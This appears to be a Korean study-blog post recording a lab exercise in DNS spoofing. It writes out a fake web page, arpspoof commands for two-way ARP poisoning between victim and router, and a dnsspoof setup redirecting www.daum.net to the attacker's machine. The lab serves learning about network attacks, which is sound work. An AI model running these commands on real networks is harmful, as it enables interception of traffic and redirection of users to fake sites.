일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- DART
- scroll
- 안드로이드
- 앱
- Flutter
- Compose
- data
- activity
- CustomScrollView
- textfield
- textview
- viewmodel
- android
- 테스트
- Coroutines
- TEST
- Button
- livedata
- intent
- binding
- LifeCycle
- 계측
- 앱바
- ScrollView
- appbar
- Kotlin
- Dialog
- tabbar
- Navigation
- drift
- Today
- Total
Study Record
[네트워크 해킹] DNS Spoofing 본문
1. DNS Spooging 이란?
☞ DNS 서버로 보내는 질문을 가로채서 변조된 결과를 보내주는 것으로 일종의 중간자 공격이다.
2. 실습 개요
㉮ 공격자는 가짜 사이트를 구축하고 자신의 dns 서버에 등록한다.
㉯ 공격자는 arpspoofing 을 통해 공격대상 시스템이 통신할 때 공격자를 통하도록 한다.
㉰ 공격 대상 시스템이 사이트에 대한 요청을 하면 공격자는 가짜 사이트에 대한 IP를 알려준다.
㉱ 공격 대상 시스템은 공격자가 만든 가짜 사이트로 접속하게 된다.
< 사용 시스템 >
공격자 : kaliLinux (192.168.20.50)
공격 대상 : Window 2008 (192.168.20.201)
방화벽/라우터 : Linux (192.168.20.100)
3. 실습 과정
[kaliLinux]
- 가짜 사이트 구축
㉮ # vi /var/www/html/index.html 에 가짜 사이트를 만들어준다.
<html>
<center><h1>Fake Web Site</h1></center>
</html>
㉯ 웹 서버를 시작한다.
# systemctl restart apache2
# systemctl status apache2
㉱ arpspoofing & dnsspoofing 설정을 한다.
[TERM1] # arpspoof -i eth1 -t 192.168.20.100 192.168.20.201
[TERM2] # arpspoof -i eth1 -t 192.168.20.201 192.168.20.100
[TERM3] # echo "192.168.20.50 www.daum.net" > /daum.txt
# dnsspoof -i eth1 -f /daum.txt
[Window 2008]
㉲ 다음 사이트에 접속해본다. 실습이 정상적으로 된 것을 볼 수 있다.
+ KaliLinx 의 dnssppofing 된 것을 확인해보면 다음과 같다.
'네트워크 해킹' 카테고리의 다른 글
[네트워크 해킹] ARP 관련 명령어 (0) | 2021.12.10 |
---|---|
[네트워크 해킹] hping3 (0) | 2021.11.08 |
[네트워크 해킹] IP 우회 (0) | 2021.11.08 |
[네트워크 해킹] ARP Spoofing Attack ( ARP Cache Poisoning Attack ) (0) | 2021.11.07 |
네트워크 해킹 및 보안 - DHCP - 수정 필요 (0) | 2021.10.28 |